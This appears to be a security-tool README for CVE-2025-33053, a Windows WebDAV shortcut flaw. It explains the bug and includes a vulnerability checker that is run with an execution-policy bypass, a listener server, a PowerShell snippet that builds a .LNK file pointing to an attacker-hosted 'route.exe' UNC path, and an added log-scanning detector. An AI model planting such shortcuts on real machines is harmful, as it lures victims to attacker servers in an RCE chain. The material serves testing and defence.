## https://sploitus.com/exploit?id=157B2D55-FDF3-55DD-96B9-D6A80DB087D7
# CVE-2025-33053 Vulnerability Checker & Proof-of-Concept (PoC)

A complete set of tools to check and demonstrate potential exploitation of **CVE-2025-33053**, a critical WebDAV-based Remote Code Execution (RCE) vulnerability affecting Windows systems.
---
## About CVE-2025-33053
**CVE-2025-33053** allows attackers to exploit `.LNK` shortcut files that reference malicious remote WebDAV shares, potentially leading to Remote Code Execution (RCE) on affected systems.
### Vulnerability Conditions:
- **WebClient service** must be installed and running on the target.
- The target OS must **resolve UNC paths over WebDAV** when such paths are accessed, even via `.LNK` files.
---
## How Does the Vulnerability Work?
1. **Crafted `.LNK` File or Direct UNC Path Access**, pointing to a remote UNC path like:
2. When the `.LNK` is accessed or the UNC path is manually browsed (e.g., via File Explorer):
   - The **WebClient service** initiates communication to the remote UNC location via WebDAV.
   - The system sends a **PROPFIND** request to query metadata from the attacker's server.
3. Upon receiving the PROPFIND request, the attacker can confirm that:
   - The target system resolves UNC paths via WebDAV.
   - The system is potentially vulnerable to **CVE-2025-33053**.
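
A defender can look for the same PROPFIND signal at the network egress. The following is an added example, not code from this repository: it scans proxy log lines for PROPFIND requests that carry the Windows WebClient User-Agent prefix `Microsoft-WebDAV-MiniRedir` and go to hosts outside an internal set. The log format, the sample lines, the internal ranges and the `dav.corp.example` allowlist entry are assumptions constructed for illustration.

```python
import ipaddress
import re

# Constructed sample proxy log (this line format is an assumption of the example):
# timestamp client_ip METHOD url status "user-agent"
SAMPLE_LOG = """\
2025-06-12T09:14:07Z 10.1.4.23 OPTIONS http://203.0.113.50:8000/ 200 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2025-06-12T09:14:07Z 10.1.4.23 PROPFIND http://203.0.113.50:8000/route.exe 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2025-06-12T09:15:40Z 10.1.7.9 PROPFIND http://10.1.0.5/share/docs 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"
2025-06-12T09:16:11Z 10.1.8.2 PROPFIND http://files.example.net/dav/ 207 "cadaver/0.24"
2025-06-12T09:17:30Z 10.1.9.4 PROPFIND https://dav.corp.example/team/ 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) '
    r'(?P<scheme>https?)://(?P<host>\[[^\]]+\]|[^/:\s]+)(?::(?P<port>\d+))?(?:/\S*)? '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)
WEBCLIENT_UA = "Microsoft-WebDAV-MiniRedir"  # User-Agent prefix sent by the Windows WebClient service
# Assumed definition of "internal": RFC 1918, loopback and link-local ranges plus an allowlist.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
INTERNAL_HOSTS = {"dav.corp.example"}  # hypothetical sanctioned WebDAV server


def is_internal(host):
    """True for IP literals in INTERNAL_NETS or hostnames on the allowlist."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return host.lower() in INTERNAL_HOSTS
    return any(ip in net for net in INTERNAL_NETS)


def find_external_webdav(log_text):
    """Return (timestamp, client, host, port) per WebClient PROPFIND to a non-internal host."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # line does not follow the assumed format
        if m["method"] != "PROPFIND" or not m["ua"].startswith(WEBCLIENT_UA):
            continue
        if is_internal(m["host"]):
            continue
        default_port = 443 if m["scheme"] == "https" else 80
        hits.append((m["ts"], m["client"], m["host"], int(m["port"] or default_port)))
    return hits
```

Calling `find_external_webdav(SAMPLE_LOG)` returns only the request to `203.0.113.50:8000`; the internal share, the non-Windows DAV client and the allowlisted server are not reported.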
---
## Real-Time Vulnerability Checker (`CVE-2025-33053_checker.ps1`)
### What It Does:
| Check | Purpose |
|-------------------------------------|------------------------------------------------------------------|
| **WebClient Service Status** | Confirms if WebDAV support is active and running. |
| **UNC Path Handling via Test-Path** | Tests if the system resolves remote WebDAV UNC paths (key precondition for CVE exploitation). |
### How to Run:
1. **Open PowerShell as Administrator.**
2. If script execution is restricted, run:
```powershell
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
```
3. Run the checker:
```powershell
.\CVE-2025-33053_checker.ps1
```
---
## Proof-of-Concept (PoC) Server (`CVE-2025-33053_PoC.py`)
### What It Does:
- Sets up a Python-based WebDAV-like server on the attacker's machine.
- Captures incoming PROPFIND requests when the victim system resolves the malicious UNC path.
- Displays in the terminal that the system reached out, proving that exploitation is possible.

Note: Tested in VM.
### Usage:
1. On the attacker's (Kali) machine:
```bash
python3 CVE-2025-33053_PoC.py --port 8000
```
2. On the target machine:
- Open the UNC path directly in File Explorer:
```text
\\<Kali-IP>@8000\DavWWWRoot\route.exe
```
- Manually create a `.LNK` file in Windows or simply navigate to:
```text
\\<Kali-IP>@8000\DavWWWRoot\route.exe
```
- Example PowerShell method to create a shortcut file:
```powershell
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
```
3. If the target is vulnerable, the PoC server will log:
```text
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!
```
---
## Why This PoC is Legitimate and Reliable:
- Uses real UNC path resolution, no simulation.
- Captures actual PROPFIND requests triggered by the OS, the exact behavior required for CVE exploitation.
- Demonstrates real network-level evidence of vulnerability, without executing payloads or causing harm.
---
## Important Notes
- This PoC does not exploit or harm the target system; it only detects the underlying vulnerable behavior.
- Intended for use in controlled environments or with explicit authorization.
- Demonstrates real system behavior, not a mock simulation.

**To be used for educational purposes only. Do not run on unauthorised systems.**
---
## License
MIT License. Free for educational, research, and defensive purposes only.
---
## Contributing
Pull Requests welcome: improve detection, add features, or suggest fixes.
---
## Disclaimer
This repository is **for educational and authorized security research only.**
Misuse against systems you do not own or have permission to test is strictly forbidden.